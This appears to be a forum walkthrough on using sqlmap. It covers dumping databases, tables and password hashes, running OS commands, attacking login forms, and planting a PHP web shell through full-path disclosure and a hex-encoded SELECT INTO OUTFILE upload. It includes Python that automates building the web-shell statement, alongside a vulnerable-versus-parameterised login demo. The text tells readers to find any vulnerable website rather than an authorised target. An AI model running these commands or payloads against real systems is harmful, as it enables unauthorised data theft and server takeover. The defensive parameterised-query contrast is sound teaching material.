How to use SQLMAP

Hello, this is a SQLMAP walkthrough for L33TZone.org written by AnonymousFigure



How to use sqlmap

First find a website that is vulnerable: a page whose parameter ends up in a database query (the examples below use a lab host, 192.168.83.132, with an injectable id parameter)



sqlmap -u http://192.168.83.132/cat.php?id=1 --dbs 

(lists the databases on the back-end server)





sqlmap -u http://192.168.83.132/cat.php?id=1 -D (database-name) --tables

(lists the tables in that database; -D takes the database name from the --dbs output)




sqlmap -u http://192.168.83.132/cat.php?id=1 -D (database-name) -T (table-name) --columns

(lists the columns of that table)




sqlmap -u http://192.168.83.132/cat.php?id=1 -D (database-name) -T (table-name) -C (column-name) --dump

(dumps that column, e.g. -C user_pass; several columns can be given separated by commas, and leaving -C out dumps the whole table)




Or you can go straight for the password hashes of the database accounts (these are the DBMS users, not the web application's users, which live in an ordinary table; sqlmap will offer to crack the hashes with its built-in dictionary):


sqlmap -u http://192.168.83.132/cat.php?id=1 --passwords




Logging in to the database

With a cracked database account you can connect directly (only if the MySQL port, 3306 by default, is reachable from your machine; many targets bind it to localhost or firewall it):


mysql -u username -p -h 192.168.1.1



Other ways to use SQLMAP


sqlmap -u "http://www.example.com/page.php?id=15" --current-user --is-dba

(shows which database account the application connects as and whether it has DBA privileges; the URL is a placeholder)

sqlmap -u "http://www.example.com/page.php?id=15" --os-cmd=whoami -v 1

(--os-cmd needs the command to run as its argument; it only works when sqlmap can get code execution through the DBMS, which on MySQL means writing a stager into the web root, so it needs the FILE privilege and a known, writable path, the same conditions as the manual upload at the end of this page)


Dump it all


sqlmap -u http://192.168.1.1/ --forms --dump-all

(--forms makes sqlmap fetch the page, find its HTML forms and test each field; --dump-all dumps every database the account can read, which is slow and very noisy)


Hit that login with sql injection


sqlmap -u "http://192.168.83.134/index.php" --dbms=MySQL --dump --data "uname=test&psw=pass" --level=5 --risk=3

(--data sends the form fields as a POST body and both get tested; --level=5 also tests cookie, User-Agent and Referer headers, and --risk=3 adds OR-based payloads, which can modify or delete rows if the injectable query is an UPDATE or DELETE, so keep it off anything you are not allowed to damage)
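The form injection above works because the application pastes uname and psw into the query text. Here, as an added example that is not part of the original walkthrough, a small Python/SQLite model of such a login, the vulnerable version beside a parameterised one, fed the kind of OR-based payload sqlmap tries at --risk=3. The table and credentials are constructed for the demo; nothing here contacts a target.

```python
import sqlite3

# Constructed demo table shaped like the login form's fields (uname / psw);
# not the page's target, just enough to exercise the query logic offline.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (uname TEXT, psw TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "s3cret"), ("test", "pass")])
    return conn

def login_vulnerable(conn, uname, psw):
    """Form fields pasted straight into the query text: the pattern that
    sqlmap's --data "uname=...&psw=..." probing finds and exploits."""
    sql = "SELECT uname FROM users WHERE uname = '%s' AND psw = '%s'" % (uname, psw)
    row = conn.execute(sql).fetchone()
    return row[0] if row else None

def login_safe(conn, uname, psw):
    """Same check with bound parameters: the payload is compared as a string,
    so the OR never becomes part of the WHERE clause."""
    sql = "SELECT uname FROM users WHERE uname = ? AND psw = ?"
    row = conn.execute(sql, (uname, psw)).fetchone()
    return row[0] if row else None

# OR-based boolean payload, the class of test sqlmap enables at --risk=3.
# Placed in the password field it turns the WHERE clause into
#   (uname = 'admin' AND psw = 'x') OR '1'='1'
# which is true for every row, so the first user comes back.
PAYLOAD = "x' OR '1'='1"

def demo():
    conn = make_db()
    return {
        "vulnerable": login_vulnerable(conn, "admin", PAYLOAD),  # 'admin': bypassed
        "safe": login_safe(conn, "admin", PAYLOAD),              # None: rejected
        "legit": login_safe(conn, "test", "pass"),               # 'test'
    }

if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

The --dump in the sqlmap command above extracts data through exactly this kind of hole; the parameterised version is what the application would need to fix it.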


Upload a php-shell with sqlmap


1. After finding a vulnerable site you need Full Path Disclosure (the absolute path of the web root on the server's disk)

I will use the empty array trick: add brackets [] to the parameter so PHP hands the script an array instead of a string and the resulting warning leaks the file's path

http://www.example.com/index.php?id[]=1

gives

Warning:  mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/relax/public_html/index.php on line 59

now we have the path: the web root is /home/relax/public_html/ (this only works while the server has display_errors on; if the page stays silent the warning went to the error log instead)


2. now you need to convert your upload script to hex (MySQL accepts a 0x... literal as a string, so the script can be written to disk without any quotes or special characters appearing in the query)

<form enctype="multipart/form-data" action="upload.php" method="POST"><input name="uploadedfile" type="file"/><input type="submit" value="Upload File"/></form> <?php $target_path=basename($_FILES['uploadedfile']['name']);if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'],$target_path)){echo basename($_FILES['uploadedfile']['name'])." has been uploaded";}else{echo "Error!";}?>

becomes

0x followed by two hex digits per byte of the script (the full hex string is not reproduced here)


3. Now let's fire up sqlmap with a sql-shell and inject


python sqlmap.py --url=http://www.example.com/index.php?id=1 --sql-shell

let sqlmap do its work and after a while you will get a sql-shell:

[15:35:06] [INFO] the back-end DBMS is MySQL

web server operating system: Windows

web application technology: PHP 5.3.5, Apache 2.2.17

back-end DBMS: MySQL 5

[15:35:06] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER

sql-shell>

now run

SELECT 0xYour_Hex_Code INTO OUTFILE "Full_Path+filename";

don't forget the 0x before your hex, so it should look like

select 0x<hex of the upload script> into outfile "/home/relax/public_html/upload.php";

After a few seconds you should get a confirmation of whether it worked. For it to work the database account needs the FILE privilege, secure_file_priv must not restrict the destination, the MySQL server process must be able to write into the web root (so the database has to run on the web server host), and the file must not already exist, because INTO OUTFILE refuses to overwrite.


4. browse to http://www.example.com/upload.php and upload the php shell


5. browse to your php shell and login
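Steps 1 to 3 above, carried out in Python as an added example (not code from the walkthrough): pull the web root out of a copy of the PHP warning, hex-encode the uploader from step 2, and build the SELECT ... INTO OUTFILE statement you would paste into the sql-shell. The warning text is constructed after the one shown on this page, the uploader is the step 2 script verbatim, and the statement is only built locally, not sent anywhere.

```python
import re

# Constructed copy of the warning the id[]=1 trick produced on the page.
WARNING = ("Warning:  mysql_fetch_array(): supplied argument is not a valid "
           "MySQL result resource in /home/relax/public_html/index.php on line 59")

# The minimal uploader from step 2, exactly as it should land on disk.
UPLOADER = ('<form enctype="multipart/form-data" action="upload.php" method="POST">'
            '<input name="uploadedfile" type="file"/>'
            '<input type="submit" value="Upload File"/></form> '
            "<?php $target_path=basename($_FILES['uploadedfile']['name']);"
            "if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'],$target_path))"
            "{echo basename($_FILES['uploadedfile']['name']).\" has been uploaded\";}"
            'else{echo "Error!";}?>')

def web_root_from_warning(text):
    """Step 1: take the directory out of a PHP 'in /path/file.php on line N'
    warning. Greedy match keeps everything up to the last slash before the
    script name, so nested web roots come out whole."""
    m = re.search(r" in (/\S+)/[^/\s]+\.php on line \d+", text)
    if not m:
        raise ValueError("no PHP path in warning text")
    return m.group(1)

def to_mysql_hex(payload):
    """Step 2: MySQL 0x... literal, two hex digits per byte of the UTF-8 script.
    No quotes appear in the literal, so the query needs no escaping at all."""
    return "0x" + payload.encode("utf-8").hex()

def outfile_statement(payload, directory, filename="upload.php"):
    """Step 3: the statement typed into sqlmap's sql-shell. MySQL writes the
    literal's bytes verbatim to <directory>/<filename> (FILE privilege,
    secure_file_priv and a writable, not yet existing target all required)."""
    target = f"{directory.rstrip('/')}/{filename}"
    return f"SELECT {to_mysql_hex(payload)} INTO OUTFILE '{target}';"

def decode_hex_literal(literal):
    """Reverse check before firing: what MySQL would actually write to disk."""
    if not literal.startswith("0x"):
        raise ValueError("not a 0x literal")
    return bytes.fromhex(literal[2:]).decode("utf-8")

if __name__ == "__main__":
    root = web_root_from_warning(WARNING)
    stmt = outfile_statement(UPLOADER, root)
    print(stmt[:60] + " ... " + stmt[-50:])
    print("round-trips:", decode_hex_literal(to_mysql_hex(UPLOADER)) == UPLOADER)
```

Checking the round trip before pasting matters because INTO OUTFILE will not overwrite: a typo in the hex leaves a broken upload.php in the web root and the name is burned.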

Last modified: Tuesday, 8 March 2016, 9:09 AM